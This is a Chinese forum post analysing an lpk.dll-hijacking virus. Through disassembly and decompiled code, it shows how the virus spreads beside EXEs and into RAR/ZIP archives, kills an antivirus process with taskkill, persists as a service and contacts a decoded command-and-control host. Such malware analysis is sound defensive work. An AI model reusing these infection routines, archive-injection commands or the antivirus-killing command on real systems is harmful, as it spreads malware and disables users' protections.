首页
论坛
课程
招聘
[原创]lpk类病毒分析
2011-2-6 20:23 28608

[原创]lpk类病毒分析

2011-2-6 20:23
28608
lpk类病毒分析
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html

除夕那天晚上写了个Lpk、并对lpk做了点研究、所以想必今天晚上看起来这些应该会方便很多、至于关于
lpk的文章请去我Blog参考笔记、这里就不废话了
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接载入Lpk11.dll
.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID 
lpReserved)
.text:10001A32                 public DllEntryPoint
.text:10001A32 DllEntryPoint   proc near
.text:10001A32
.text:10001A32 hLibModule      = dword ptr  4
.text:10001A32 fdwReason       = dword ptr  8
.text:10001A32 lpReserved      = dword ptr  0Ch
.text:10001A32
.text:10001A32                 cmp     [esp+fdwReason], 1
.text:10001A37                 push    esi
.text:10001A38                 jnz     short loc_10001AA9
.text:10001A3A                 mov     esi, [esp+4+hLibModule]
.text:10001A3E                 push    104h            ; nSize
.text:10001A43                 push    offset ExistingFileName ; lpFilename
.text:10001A48                 push    esi             ; hModule
.text:10001A49                 mov     dword_10003290, esi
.text:10001A4F                 call    ds:GetModuleFileNameW
.text:10001A55                 push    esi             ; hLibModule
.text:10001A56                 call    ds:DisableThreadLibraryCalls
.text:10001A5C                 call    GetMutexName
.text:10001A61                 cmp     eax, 1
.text:10001A64                 jnz     short loc_10001AA2
.text:10001A66                 call    IsVirusKernelFile  ;用来判断是否由病毒核
心进程释放
.text:10001A6B                 test    eax, eax
.text:10001A6D                 jnz     short loc_10001A7D
.text:10001A6F                 call    CreateMutex
.text:10001A74                 test    eax, eax
.text:10001A76                 jnz     short loc_10001A7D
.text:10001A78                 call    ExpandVirusKernel
.text:10001A7D
.text:10001A7D loc_10001A7D:                           ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D                                         ; DllEntryPoint+44j
.text:10001A7D                 call    IsCurrentFileLpk
.text:10001A82                 cmp     eax, 1
.text:10001A85                 jnz     short loc_10001AA2
.text:10001A87                 push    0               ; lpName
.text:10001A89                 push    0               ; bInitialState
.text:10001A8B                 push    eax             ; bManualReset
.text:10001A8C                 push    0               ; lpEventAttributes
.text:10001A8E                 call    ds:CreateEventW
.text:10001A94                 mov     hHandle, eax
.text:10001A99                 test    eax, eax
.text:10001A9B                 jz      short loc_10001AA2
.text:10001A9D                 call    StartInfectThraed
.text:10001AA2
.text:10001AA2 loc_10001AA2:                           ; CODE XREF: DllEntryPoint+32j
.text:10001AA2                                         ; DllEntryPoint+53j ...
.text:10001AA2                 call    InitLpk
.text:10001AA7                 jmp     short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------

009119E6 <lpk11.StartThread>  /$  56            push    esi
009119E7                      |.  33F6          xor     esi, esi
009119E9                      |.  56            push    esi                              ; 
/pThreadId => NULL
009119EA                      |.  6A 04         push    4                                ; |
CreationFlags = CREATE_SUSPENDED
009119EC                      |.  56            push    esi                              ; |
pThreadParm => NULL
009119ED                      |.  68 D3189100   push    <FuckAllDisk>                    ; |
ThreadFunction = <lpk11.FuckAllDisk>
009119F2                      |.  56            push    esi                              ; |
StackSize => 0
009119F3                      |.  56            push    esi                              ; |
pSecurity => NULL
009119F4                      |.  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; 
\CreateThread
009118D3 <lpk11.FuckAllDisk>   .  81EC C4000000 sub     esp, 0C4
009118D9                       .  53            push    ebx
009118DA                       .  55            push    ebp
009118DB                       .  56            push    esi
009118DC                       .  57            push    edi
009118DD                       .  6A 60         push    60                               ; 
/Length = 60 (96.)
009118DF                       .  8D4424 78     lea     eax, dword ptr [esp+78]          ; |
009118E3                       .  50            push    eax                              ; |
Destination
009118E4                       .  33FF          xor     edi, edi                         ; |
009118E6                       .  FF15 34209100 call    dword ptr [<&KERNEL32.RtlZeroMem>; 
\RtlZeroMemory
009118EC                       >  6A 02         push    2
009118EE                       .  5B            pop     ebx
009118EF                       .  8D6C24 74     lea     ebp, dword ptr [esp+74]
009118F3                       .  C74424 10 180>mov     dword ptr [esp+10], 18
009118FB                       >  837D 00 01    cmp     dword ptr [ebp], 1
009118FF                       .  74 5B         je      short 0091195C
00911901                       .  53            push    ebx
00911902                       .  FF15 B4209100 call    dword ptr [<&SHELL32.#64>]       ;  
shell32.DriveType
00911908                       .  83C0 FE       add     eax, -2
0091190B                       .  83F8 02       cmp     eax, 2                           ;  类
型否为可感染类型?
0091190E                       .  77 4C         ja      short 0091195C
00911910                       .  33C0          xor     eax, eax
00911912                       .  50            push    eax                              ; 
/pThreadId => NULL
00911913                       .  6A 04         push    4                                ; |
CreationFlags = CREATE_SUSPENDED
00911915                       .  53            push    ebx                              ; |
pThreadParm
00911916                       .  68 77169100   push    <Infect>                         ; |
ThreadFunction = <lpk11.Infect>
0091191B                       .  50            push    eax                              ; |
StackSize => 0
0091191C                       .  50            push    eax                              ; |
pSecurity => NULL
0091191D                       .  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; 
\CreateThread



来张图片
接下来的用ida分析
signed int __stdcall Infect(LPCWSTR lpString1)
{
  const WCHAR *v2; // [url=mailto:eax@17]eax@17[/url]
  struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
  WCHAR String2; // [sp+254h] [bp-418h]@4
  WCHAR FileName; // [sp+45Ch] [bp-210h]@6
  HANDLE hFindFile; // [sp+664h] [bp-8h]@6
  int v7; // [sp+668h] [bp-4h]@1
  const WCHAR *v8; // [sp+674h] [bp+8h]@17
  v7 = 1;
  if ( WaitForSingleObject(hHandle, 0) != 258 )
    return 0;
  if ( (unsigned int)lpString1 >= 0x100 )
  {
    lstrcpyW(&String2, lpString1);
  }
  else
  {
    lstrcpyW(&String2, L"A:\\");
    String2 += (unsigned __int16)lpString1;
  }
  lstrcpyW(&FileName, &String2);
  PathAppendW(&String2, &word_10002374);
  hFindFile = FindFirstFileW(&String2, &FindFileData);
  if ( hFindFile == (HANDLE)-1 )
    return 1;
  lstrcpyW(&String2, &FileName);
  while ( 1 )
  {
    if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") 
)
      goto LABEL_27;
    if ( FindFileData.dwFileAttributes & 0x10 )
      break;
    v2 = PathFindExtensionW(FindFileData.cFileName);
    v8 = v2;
    if ( v2 )
    {
      if ( !lstrcmpiW(v2, L".EXE") )            // 目录下有exe就将lpk复制过去
      {
        lstrcpyW(&FileName, &String2);
        PathAppendW(&FileName, L"lpk.dll");
        if ( GetFileAttributesW(&FileName) != -1 )
          goto LABEL_27;
        CopyFileW(&ExistingFileName, &FileName, 1);
        SetFileAttributesW(&FileName, 7u);
      }
      if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// 压缩包感染过程
      {
        if ( !FindFileData.nFileSizeHigh )
        {
          if ( FindFileData.nFileSizeLow < 0x3200000 )
          {
            lstrcpyW(&FileName, &String2);
            PathAppendW(&FileName, FindFileData.cFileName);
            InfectCompressFile(&FileName);
          }
        }
      }
    }
这个函数相对来说比较有意思
DWORD __cdecl InfectCompressFile(int a1)
{
  DWORD result; // [url=mailto:eax@1]eax@1[/url]
  wchar_t v2[2]; // [url=mailto:eax@3]eax@3[/url]
  UINT v3; // [url=mailto:eax@6]eax@6[/url]
  WCHAR CommandLine; // [sp+0h] [bp-824h]@6
  WCHAR PathName; // [sp+410h] [bp-414h]@6
  WCHAR FileName; // [sp+618h] [bp-20Ch]@1
  const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3
  int v8; // [sp+820h] [bp-4h]@1
  v8 = 520;
  result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, 
&FileName, &v8);
  if ( !result )
  {
    if ( FileName == 34 )
    {
      lstrcpyW(&FileName, &String2);
      *(_DWORD *)v2 = L"\"";
    }
    else
    {
      *(_DWORD *)v2 = L" ";
    }
    result = StrStrIW(&FileName, *(_DWORD *)v2);
    if ( result )
    {
      *(_WORD *)result = 0;
      PathRemoveFileSpecW(&FileName);
      PathAppendW(&FileName, L"rar.exe");
      result = GetFileAttributesW(&FileName);
      if ( result != -1 )
      {
        PathGetShortPath(&FileName);
        GetTempPathW(MAX_PATH, &PathName);
        v3 = GetCurrentThreadId();
        GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
        ((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
          &CommandLine,
          L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
          &FileName,
          a1,
          &PathName);
        result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        if ( result )
        {
          wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1, 
&PathName);
          UpdatePackage(&CommandLine, 0x1D4C0u);
          Infect(&PathName);
          wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName, 
&PathName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x3A980u);
          wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
          result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        }
      }
    }
  }
  return result;
}
- -其实也没啥深奥的东西……

以下是病毒释放出来的核心exe程序分析

有趣的IAT加密
用SOD申请一块内存空间、其实1个字节足以……懒得找空地了、浪费下……
decode
FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA

将Decode复制到00403600
00403600   $  FF05 0000AF00 inc     dword ptr [AF0000]
然后将EIP设置到00403600直接运行、程序当掉以后IAT就解密了……
用这块代码把第一部分IAT解密出来了
00403636   .- FF25 E08D4000 jmp     dword ptr [408DE0]               ;  USER32.LoadIconA
0040363C   $  51            push    ecx
0040363D   .  52            push    edx
0040363E   .  68 DC8D4000   push    00408DDC
00403643   .^ E9 E0FFFFFF   jmp     00403628
00403648   .- FF25 DC8D4000 jmp     dword ptr [408DDC]               ;  USER32.wsprintfA
0040364E   $  51            push    ecx
0040364F   .  52            push    edx
00403650   .  68 D88D4000   push    00408DD8
00403655   .^ E9 CEFFFFFF   jmp     00403628
0040365A   .- FF25 D88D4000 jmp     dword ptr [408DD8]               ;  
USER32.GetDesktopWindow
00403660   $  51            push    ecx
00403661   .  52            push    edx
00403662   .  68 E48D4000   push    00408DE4
00403667   .^ E9 BCFFFFFF   jmp     00403628
0040366C   .- FF25 E48D4000 jmp     dword ptr [408DE4]               ;  USER32.SetWindowLongA
00403672   $  51            push    ecx
00403673   .  52            push    edx
00403674   .  68 D08D4000   push    00408DD0
00403679   .^ E9 AAFFFFFF   jmp     00403628
0040367E   .- FF25 D08D4000 jmp     dword ptr [408DD0]               ;  USER32.SendMessageA
00403684   $  51            push    ecx
00403685   .  52            push    edx
00403686   .  68 CC8D4000   push    00408DCC
0040368B   .^ E9 98FFFFFF   jmp     00403628
00403690   .- FF25 CC8D4000 jmp     dword ptr [408DCC]               ;  USER32.DrawIcon
00403696   $  51            push    ecx
00403697   .  52            push    edx
00403698   .  68 C88D4000   push    00408DC8
0040369D   .^ E9 86FFFFFF   jmp     00403628
004036A2   .- FF25 C88D4000 jmp     dword ptr [408DC8]               ;  USER32.GetClientRect
004036A8   .  51            push    ecx
004036A9   .  52            push    edx
004036AA   .  68 C48D4000   push    00408DC4
004036AF   .^ E9 74FFFFFF   jmp     00403628
004036B4   .- FF25 C48D4000 jmp     dword ptr [408DC4]               ;  
USER32.GetSystemMetrics
004036BA   $  51            push    ecx
004036BB   .  52            push    edx
004036BC   .  68 D48D4000   push    00408DD4
004036C1   .^ E9 62FFFFFF   jmp     00403628
004036C6   .- FF25 D48D4000 jmp     dword ptr [408DD4]               ;  USER32.IsIconic
004036CC   $  51            push    ecx
004036CD   .  52            push    edx
004036CE   .  68 E88D4000   push    00408DE8
004036D3   .^ E9 50FFFFFF   jmp     00403628
004036D8   .- FF25 E88D4000 jmp     dword ptr [408DE8]               ;  USER32.EnableWindow
00408DC4  77D18F9C  USER32.GetSystemMetrics
00408DC8  77D2908E  USER32.GetClientRect
00408DCC  77D3D06C  USER32.DrawIcon
00408DD0  77D2F3C2  USER32.SendMessageA
00408DD4  77D297FF  USER32.IsIconic
00408DD8  77D2D1D2  USER32.GetDesktopWindow
00408DDC  77D1A8AD  USER32.wsprintfA
00408DE0  77D2E8F6  USER32.LoadIconA
00408DE4  77D2C29D  USER32.SetWindowLongA
00408DE8  77D29849  USER32.EnableWindow

第二部分IAT解密用
004036D3   >^/E9 28FFFFFF   jmp     00403600
004036D8   .^|FF25 E88D4000 jmp     dword ptr [408DE8]               ;  ggmqgk.004036CC
004036DE   $ |51            push    ecx
004036DF   . |52            push    edx
004036E0   . |68 AC8D4000   push    00408DAC
004036E5   . |E9 00000000   jmp     004036EA
004036EA   > |68 98694000   push    00406998
004036EF   . |E8 2C020000   call    00403920
004036F4   . |5A            pop     edx
004036F5   . |59            pop     ecx
004036F6   .^\EB DB         jmp     short 004036D3
004036F8   .- FF25 AC8D4000 jmp     dword ptr [408DAC]               ;  advapi32.DeleteService
004036FE   $  51            push    ecx
004036FF   .  52            push    edx
00403700   .  68 B08D4000   push    00408DB0                         ;  ASCII "6L躻~i躻"
00403705   .^ E9 E0FFFFFF   jmp     004036EA
0040370A   .- FF25 B08D4000 jmp     dword ptr [408DB0]               ;  advapi32.OpenServiceA
00403710   $  51            push    ecx
00403711   .  52            push    edx
00403712   .  68 B48D4000   push    00408DB4                         ;  ASCII "~i躻"
00403717   .^ E9 CEFFFFFF   jmp     004036EA
0040371C   .- FF25 B48D4000 jmp     dword ptr [408DB4]               ;  
advapi32.OpenSCManagerA
00403722   $  51            push    ecx
00403723   .  52            push    edx
00403724   .  68 A88D4000   push    00408DA8
00403729   .^ E9 BCFFFFFF   jmp     004036EA
0040372E   .- FF25 A88D4000 jmp     dword ptr [408DA8]               ;  advapi32.RegCloseKey
00403734   $  51            push    ecx
00403735   .  52            push    edx
00403736   .  68 A48D4000   push    00408DA4
0040373B   .^ E9 AAFFFFFF   jmp     004036EA
00403740   .- FF25 A48D4000 jmp     dword ptr [408DA4]               ;  
advapi32.RegQueryValueExA
00403746   $  51            push    ecx
00403747   .  52            push    edx
00403748   .  68 A08D4000   push    00408DA0
0040374D   .^ E9 98FFFFFF   jmp     004036EA
00403752   .- FF25 A08D4000 jmp     dword ptr [408DA0]               ;  advapi32.RegOpenKeyExA
00403758   .  51            push    ecx
00403759   .  52            push    edx
0040375A   .  68 9C8D4000   push    00408D9C
0040375F   .^ E9 86FFFFFF   jmp     004036EA
00403764   .- FF25 9C8D4000 jmp     dword ptr [408D9C]               ;  
advapi32.SetServiceStatus
0040376A   $  51            push    ecx
0040376B   .  52            push    edx
0040376C   .  68 988D4000   push    00408D98
00403771   .^ E9 74FFFFFF   jmp     004036EA
00403776   .- FF25 988D4000 jmp     dword ptr [408D98]               ;  
advapi32.RegisterServiceCtrlHandlerA
0040377C   $  51            push    ecx
0040377D   .  52            push    edx
0040377E   .  68 948D4000   push    00408D94
00403783   .^ E9 62FFFFFF   jmp     004036EA
00403788   .- FF25 948D4000 jmp     dword ptr [408D94]               ;  
advapi32.StartServiceCtrlDispatcherA
0040378E   $  51            push    ecx
0040378F   .  52            push    edx
00403790   .  68 908D4000   push    00408D90
00403795   .^ E9 50FFFFFF   jmp     004036EA
0040379A   .- FF25 908D4000 jmp     dword ptr [408D90]               ;  
advapi32.CloseServiceHandle
004037A0   $  51            push    ecx
004037A1   .  52            push    edx
004037A2   .  68 8C8D4000   push    00408D8C
004037A7   .^ E9 3EFFFFFF   jmp     004036EA
004037AC   .- FF25 8C8D4000 jmp     dword ptr [408D8C]               ;  
advapi32.RegSetValueExA
004037B2   $  51            push    ecx
004037B3   .  52            push    edx
004037B4   .  68 888D4000   push    00408D88
004037B9   .^ E9 2CFFFFFF   jmp     004036EA
004037BE   .- FF25 888D4000 jmp     dword ptr [408D88]               ;  advapi32.RegOpenKeyA
004037C4   $  51            push    ecx
004037C5   .  52            push    edx
004037C6   .  68 808D4000   push    00408D80
004037CB   .^ E9 1AFFFFFF   jmp     004036EA
004037D0   .- FF25 808D4000 jmp     dword ptr [408D80]               ;  advapi32.StartServiceA
004037D6   $  51            push    ecx
004037D7   .  52            push    edx
004037D8   .  68 848D4000   push    00408D84
004037DD   .^ E9 08FFFFFF   jmp     004036EA
004037E2   .- FF25 848D4000 jmp     dword ptr [408D84]               ;  
advapi32.CreateServiceA
00408D80  77DBFB38  advapi32.StartServiceA
00408D84  77E071E9  advapi32.CreateServiceA
00408D88  77DAEFB8  advapi32.RegOpenKeyA
00408D8C  77DAEAD7  advapi32.RegSetValueExA
00408D90  77DB6CC5  advapi32.CloseServiceHandle
00408D94  77E07EB1  advapi32.StartServiceCtrlDispatcherA
00408D98  77DC4E96  advapi32.RegisterServiceCtrlHandlerA
00408D9C  77DC3231  advapi32.SetServiceStatus
00408DA0  77DA7842  advapi32.RegOpenKeyExA
00408DA4  77DA7AAB  advapi32.RegQueryValueExA
00408DA8  77DA6C17  advapi32.RegCloseKey
00408DAC  77E07489  advapi32.DeleteService
00408DB0  77DC4C36  advapi32.OpenServiceA
00408DB4  77DC697E  advapi32.OpenSCManagerA
- -不过解密这些意义不大……IDA都帮着分析出来了……解出来娱乐下自己而已……好了、剩下的代码类似
、大家有兴趣自己玩好了……
.text:004029E0 ; =============== S U B R O U T I N E =======================================
.text:004029E0
.text:004029E0 ; Attributes: bp-based frame
.text:004029E0
.text:004029E0 OnInit          proc near               ; DATA XREF: .rdata:00406474o
.text:004029E0
.text:004029E0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004029E0 var_8           = dword ptr -8
.text:004029E0 var_4           = dword ptr -4
.text:004029E0
.text:004029E0                 push    ebp
.text:004029E1 ; 8:   v1 = this;
.text:004029E1                 mov     ebp, esp
.text:004029E3                 sub     esp, 10h
.text:004029E6                 push    esi
.text:004029E7                 push    edi
.text:004029E8                 mov     esi, ecx
.text:004029EA ; 9:   CDialog__OnInitDialog();
.text:004029EA                 call    [url=mailto:?OnInitDialog@CDialog@@UAEHXZ]?OnInitDialog@CDialog@@UAEHXZ[/url] ; CDialog::OnInitDialog
(void)
.text:004029EF ; 10:   SendMessageA(*((HWND *)v1 + 8), 128u, 1u, *((_DWORD *)v1 + 24));
.text:004029EF                 mov     eax, [esi+60h]
.text:004029F2                 mov     ecx, [esi+20h]
.text:004029F5                 mov     edi, SendMessageA
.text:004029FB                 push    eax             ; lParam
.text:004029FC                 push    1               ; wParam
.text:004029FE                 push    80h             ; Msg
.text:00402A03                 push    ecx             ; hWnd
.text:00402A04                 call    edi ; SendMessageA
.text:00402A06 ; 11:   SendMessageA(*((HWND *)v1 + 8), 0x80u, 0, *((_DWORD *)v1 + 24));
.text:00402A06                 mov     edx, [esi+60h]
.text:00402A09                 mov     eax, [esi+20h]
.text:00402A0C                 push    edx             ; lParam
.text:00402A0D                 push    0               ; wParam
.text:00402A0F                 push    80h             ; Msg
.text:00402A14                 push    eax             ; hWnd
.text:00402A15                 call    edi ; SendMessageA
.text:00402A17 ; 12:   if ( v1 )
.text:00402A17                 test    esi, esi
.text:00402A19                 jnz     short loc_402A1F
.text:00402A1B ; 15:     v2 = 0;
.text:00402A1B                 xor     eax, eax
.text:00402A1D                 jmp     short loc_402A22
.text:00402A1F ; ---------------------------------------------------------------------------
.text:00402A1F ; 13:     v2 = (HWND)*((_DWORD *)v1 + 8);
.text:00402A1F
.text:00402A1F loc_402A1F:                             ; CODE XREF: OnInit+39j
.text:00402A1F                 mov     eax, [esi+20h]
.text:00402A22 ; 16:   SetWindowLongA(v2, -20, 128);
.text:00402A22
.text:00402A22 loc_402A22:                             ; CODE XREF: OnInit+3Dj
.text:00402A22                 push    80h             ; dwNewLong
.text:00402A27                 push    0FFFFFFECh      ; nIndex
.text:00402A29                 push    eax             ; hWnd
.text:00402A2A                 call    SetWindowLongA
.text:00402A30 ; 17:   CWnd__SetWindowPos(v1, 0, -100, -100, 0, 0, 1);
.text:00402A30                 push    1
.text:00402A32                 push    0
.text:00402A34                 push    0
.text:00402A36                 push    0FFFFFF9Ch
.text:00402A38                 push    0FFFFFF9Ch
.text:00402A3A                 push    0
.text:00402A3C                 mov     ecx, esi
.text:00402A3E                 call    [url=mailto:?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z]?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z[/url] ; 
CWnd::SetWindowPos(CWnd const *,int,int,int,int,uint)
.text:00402A43 ; 18:   WinExec("taskkill /f /im ZhuDongFangYu.exe /t", 0);// - -这种方法也能杀
掉?作者脑子里进屎了、
.text:00402A43                 nop
.text:00402A44                 nop
.text:00402A45                 nop
.text:00402A46                 nop
.text:00402A47                 nop
.text:00402A48                 nop
.text:00402A49                 nop
.text:00402A4A                 nop
.text:00402A4B                 nop
.text:00402A4C                 nop
.text:00402A4D                 nop
.text:00402A4E                 nop
.text:00402A4F                 nop
.text:00402A50                 nop
.text:00402A51                 nop
.text:00402A52                 nop
.text:00402A53                 nop
.text:00402A54                 nop
.text:00402A55                 nop
.text:00402A56                 push    0               ; uCmdShow
.text:00402A58                 push    offset CmdLine  ; "taskkill /f /im ZhuDongFangYu.exe 
/t"
.text:00402A5D                 call    ds:WinExec
.text:00402A63 ; 19:   if ( RegOpenKey() )
.text:00402A63                 call    RegOpenKey
.text:00402A68                 pop     edi
.text:00402A69                 pop     esi
.text:00402A6A                 test    eax, eax
.text:00402A6C                 jz      short loc_402A9D
.text:00402A6E ; 21:     ServiceStartTable.lpServiceName = "Distribuvbf";
.text:00402A6E                 lea     ecx, [ebp+ServiceStartTable]
.text:00402A71                 mov     [ebp+ServiceStartTable.lpServiceName], offset 
ServiceName ; "Distribuvbf"
.text:00402A78 ; 22:     ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)
sub_402730;
.text:00402A78                 push    ecx             ; lpServiceStartTable
.text:00402A79                 mov     [ebp+ServiceStartTable.lpServiceProc], offset 
sub_402730
.text:00402A80 ; 23:     v5 = 0;
.text:00402A80                 mov     [ebp+var_8], 0
.text:00402A87 ; 24:     v6 = 0;
.text:00402A87                 mov     [ebp+var_4], 0
.text:00402A8E ; 25:     StartServiceCtrlDispatcherA(&ServiceStartTable);
.text:00402A8E                 call    StartServiceCtrlDispatcherA ; 存在就直接启动
.text:00402A94 ; 39:   return 1;
.text:00402A94
.text:00402A94 loc_402A94:                             ; CODE XREF: OnInit+DBj
.text:00402A94                 mov     eax, 1
.text:00402A99                 mov     esp, ebp
.text:00402A9B                 pop     ebp
.text:00402A9C                 retn
.text:00402A9D ; ---------------------------------------------------------------------------
.text:00402A9D ; 29:     sub_402B40(
.text:00402A9D ; 30:       "Distribuvbf",
.text:00402A9D ; 31:       "Distribuihd Transaction Coordinator Service",
.text:00402A9D ; 32:       "Distribucha Transaction Coordinator Service.");
.text:00402A9D
.text:00402A9D loc_402A9D:                             ; CODE XREF: OnInit+8Cj
.text:00402A9D                 push    offset Data     ; "Distribucha Transaction Coordinator 
Ser"...
.text:00402AA2                 push    offset DisplayName ; "Distribuihd Transaction 
Coordinator Ser"...
.text:00402AA7                 push    offset ServiceName ; "Distribuvbf"
.text:00402AAC                 call    RegServiceAndStart
.text:00402AB1 ; 33:     if ( dword_409388 )
.text:00402AB1                 mov     eax, dword_409388 ; 失败了就退出……
.text:00402AB6                 add     esp, 0Ch
.text:00402AB9                 test    eax, eax
.text:00402ABB                 jz      short loc_402A94
.text:00402ABD ; 35:       sub_402330();
.text:00402ABD                 call    MoveFile        ; 0012F65C   0012F784  |NewName = "C:
\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
.text:00402AC2 ; 36:       ExitProcess(0);
.text:00402AC2                 push    0               ; uExitCode
.text:00402AC4                 call    ds:ExitProcess
.text:00402AC4 OnInit          endp
进程Init处理
肮脏的解密
.text:004027E6 ; 20:   lpkInfect();
.text:004027E6
.text:004027E6 loc_4027E6:                             ; CODE XREF: sub_402730+A9j
.text:004027E6                 call    lpkInfect
.text:004027EB ; 21:   wsprintfA(&v0, "hra%u.dll", 33);
.text:004027EB                 push    21h
.text:004027ED                 lea     ecx, [esp+14h]
.text:004027F1                 push    offset aHraU_dll ; "hra%u.dll"
.text:004027F6                 push    ecx             ; LPSTR
.text:004027F7                 call    wsprintfA
.text:004027FD ; 22:   sub_402520(&v0);
.text:004027FD                 lea     edx, [esp+1Ch]
.text:00402801                 push    edx             ; pFileName
.text:00402802                 call    sub_402520
.text:00402807 ; 23:   LoadVirusLpk();
.text:00402807                 call    LoadVirusLpk
.text:0040280C ; 24:   decode((int)"s僼婸3344P弔?>6>6", strlen("s僼婸3344P弔?>6>6") - 1, 18);
.text:0040280C                 mov     edi, offset aSgtlp3344pptz66 ; ;  ASCII 
"scrk.3322.org:8080"
.text:0040280C                                         ; 解密以后的字符串
.text:00402811                 or      ecx, 0FFFFFFFFh
.text:00402814                 xor     eax, eax
.text:00402816                 push    12h
.text:00402818                 repne scasb
.text:0040281A                 not     ecx
.text:0040281C                 dec     ecx
.text:0040281D                 push    ecx
.text:0040281E                 push    offset aSgtlp3344pptz66 ; "s僼婸3344P弔?>6>6"
.text:00402823                 call    decode
.text:00402828 ; 25:   WSAStartup(0x202u, (struct WSAData *)((char *)&WSAData + 16));
.text:00402828                 add     esp, 1Ch
.text:0040282B                 lea     eax, [esp+294h+WSAData.szDescription+0Ch]
.text:00402832                 push    eax             ; lpWSAData
.text:00402833                 push    202h            ; wVersionRequested
.text:00402838                 call    WSAStartup
.text:0040283E                 mov     edi, ds:WaitForSingleObject
.text:00402844                 mov     ebx, ds:CloseHandle
.text:0040284A                 mov     ebp, closesocket
.text:00402850 ; 28:     hObject = CreateThraed((LPTHREAD_START_ROUTINE)bAdApple, 0);我对臭苹
果的怨念是世界级的……
.text:00402850
.text:00402850 loc_402850:                             ; CODE XREF: sub_402730+159j
.text:00402850                 push    0               ; lpParameter
.text:00402852                 push    offset bAdApple ; lpStartAddress
.text:00402857                 call    CreateThraed
.text:0040285C ; 29:     WaitForSingleObject(hObject, 0xFFFFFFFFu);
.text:0040285C                 push    0FFFFFFFFh      ; dwMilliseconds
.text:0040285E ; 26:   while ( 1 )
.text:0040285E                 push    eax             ; hHandle
.text:0040285F                 mov     hObject, eax
.text:00402864                 call    edi ; WaitForSingleObject
.text:00402866 ; 30:     CloseHandle(hObject);
.text:00402866                 mov     ecx, hObject
.text:0040286C                 push    ecx             ; hObject
.text:0040286D                 call    ebx ; CloseHandle
.text:0040286F ; 31:     closesocket(s);
.text:0040286F                 mov     edx, s
.text:00402875                 push    edx             ; s
.text:00402876                 call    ebp ; closesocket
.text:00402878 ; 33:     Sleep(0x12Cu);
.text:00402878                 push    12Ch            ; dwMilliseconds
.text:0040287D ; 32:     dword_408634 = 1;
.text:0040287D                 mov     dword_408634, 1
.text:00402887                 call    esi ; Sleep
.text:00402889                 jmp     short loc_402850


得到这么个好东西、scrk.3322.org:8080
然后就是CreateThread干坏事
坏事回调函数
004019C0   .  81EC C4090000 sub     esp, 9C4
此部分比较长了、而且不大会分析、各位有兴趣可以去看我上传的idb
然后是一系列获取计算机基本信息、然后寄送到上面解密出来的地址……装载肮脏的Lpk进行感染……

至此全病毒感染模块分析完毕……因为本人是网络白痴、就算见到了网络操作代码也不知道到底是干什么的
……囧虚……
此病毒就是启动一个服务、坏事都在服务里做,因为本人也没搞过服务程序开发、所以也不知道这块怎么分
析、不过零散的分析大概已经把服务要做的事情都分析出来了……
删除病毒时首先停止病毒服务、然后用XueTr删除病毒服务、并且来到System32下找到最新更改的exe、大概
就是那个了、建议用工具删除、因为这个东西连压缩文件都感染了、手工处理不大方便、当然也可以写个工
具……
- -讨厌这种用技术干坏事的、鄙视下病毒作者、还真是无聊啊……这种猫和老鼠的游戏大概永远都不会结
束吧……
其实说句实话今天分析这个病毒是因为中午帮同学修电脑修坏了……、发泄下、……真是Bug啊……又把别
人的Bootmgr压缩了……- -刚才已经解决完毕了……所以我也没有必要继续寂寞下去了……娱乐去了、各位
晚安。

游戏CG x1附赠
Azure[LCG]
2011.02.06

看雪论坛2020激励机制:能力值、活跃值和雪币体系!会员积分、权限和会员发帖、回帖活跃程度关联!

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (7)
雪    币: 4
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cooseasy 活跃值 2011-2-6 21:41
2
0
前排。。。      。
雪    币: 413
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
孟贤 活跃值 2011-2-6 22:11
3
0
不错呀~
雪    币: 100
活跃值: 活跃值 (16)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
NWMonster 活跃值 1 2012-3-30 03:10
4
0
